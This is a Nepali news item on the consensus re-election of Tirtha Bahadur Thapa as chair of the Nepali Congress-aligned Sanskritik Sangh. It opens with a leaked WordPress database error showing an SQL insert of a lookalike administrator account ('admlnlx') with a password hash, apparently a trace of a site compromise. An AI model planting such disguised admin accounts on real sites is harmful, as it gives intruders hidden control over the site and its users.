WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOygUVHodUywwG3VQGQqTOHEhizeuI.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:32:21', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २५–
नेपाली काँग्रेसको शुभेच्छुक संस्था सांस्कृतिक संघको अध्यक्षमा तीर्थबहादुर थापा पुनःनिर्वाचन हुनुभएको छ ।
सङ्घको आज सहमतिमा चयन भएको नयाँँ नेतृत्वमा अध्यक्षमा थापा, वरिष्ठ उपाध्यक्षमा जनार्दन आचार्य चयन हुनुभएको निर्देशन समिति सदस्य एवम् पार्टीका केन्द्रीय सदस्य गुरुराज घिमिरेले जानकारी दिनुभयो ।
त्यस्तै सङ्घको महामन्त्रीमा दुर्गा रायमाझी, शिवशङ्कर रिजाल र रोशनी केसी चयन हुनुभएको छ । सङ्घको महाधिवशेन प्रतिनिधि विवादका कारण निर्वाचन हुन नसकेपछि पार्टीले गठन गरेको निर्देशक समितिले आज सहमतिका आधारमा पाँच जना पदाधिकारीको टुङ्गो लगाएको हो ।
कार्यसमितिका बाँकी ८० पदाधिकारी तथा सदस्यको शीघ्र सहमतिका आधारमा चयन गरिने नेता घिमिरेले जनकारी दिनुभयो ।